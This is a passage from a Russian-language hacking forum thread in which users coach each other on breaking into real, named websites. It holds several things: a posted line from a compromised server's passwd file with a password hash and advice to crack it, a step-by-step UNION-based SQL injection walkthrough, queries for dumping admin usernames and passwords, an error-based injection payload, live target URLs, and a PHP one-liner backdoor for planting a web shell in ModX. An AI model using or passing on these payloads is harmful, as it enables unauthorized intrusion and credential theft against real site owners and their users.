Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка: asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6MajoyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:[email protected]:/home/asd.s1:/bin/bash Как я понимаю зашифрован пароль или я ошибаюсь? Заранее спасибо за ответ.
2winstrool, спасибо! запрос сработал без заминок, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать.
Для начала перебираешь кол-во колонок, следующим образом: frontend=79e4b338bee15a3d6ed248041302800c order by 1# Если отображает товары, значит запрос прошел, идем дальше. frontend=79e4b338bee15a3d6ed248041302800c order by 5# Если отображает товары, идем дальше frontend=79e4b338bee15a3d6ed248041302800c order by 6# Если в данном случае, не отображает - значит запрос не прошел, соответственно колонок получается 5 (это пример, у тебя по своему должно быть). Если мы определили кол-во колонок, делаем следующее: frontend=79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- (если у тебя колонок например 7, то до 7 (1,2,3,4,5,6,7)) Если все верно, то ошибки быть не должно, товары в корзине должны отображаться. И далее: frontend=-79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- Делаем значение frontend отрицательным, что бы посмотреть, если ли принтабельные поля (посмотри, появились ли где нибудь вместо текста циферки, например 1, 2, 4 любые, которых раньше не было. Если есть, то это обычная инъекция, материала на эту тему много. Если принтабельных полей нет, то это Blind SQL. Как его использовать тоже статей достаточно. Да ты прав, он зашифрован. Говорят программа John The Ripper с этим может справиться. Успехов!)
Бро, ты конечно извини, но я не экстрасенс и не врач. Хочешь чтобы тебе помогли, описывай сложности как можно подробнее
спс, разобрался вроде) делаю финальный запрос: (select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x) в ответ тишина, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...
Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin
хотел скачать рисунок, а там http авторизация походу. как обойти? http://naklejka.ru/image/data/naklejki/attributes/bpan-red2.svg Сорри, если не туда задал вопрос
наз название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:? делаю такой, но он судя по всему неправильный: ?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --+ подскажите как задать правильный запрос на проверку записей в полях таблицы? также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))
?id=-613+union+select+1,COUNT(login,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM admin--+ Если все правильно понял.
Ребят помогите пожалуйста Считается это уязвимостью ? Я отправил пост запрос с таким кодом Spoiler: Код &categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* и выдало это
ребятки, можно тут что-то сделать. ЧТо то там с ' and " не понятно как-то http://missourimhf.org/view-event.php?id=
Блин, ну это не стоило постить. http://missourimhf.org/view-event.p...12,13,14,15,16,17,18,19,20--+k&table=schedule
Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там: This directory is empty.Directories: 0 Files: 0 Data: 0 B Directory writable? No. Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы.... + Есть возможность добавить пхп код в модуль, я пробовал добавлять <?=@`$c`?>, но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?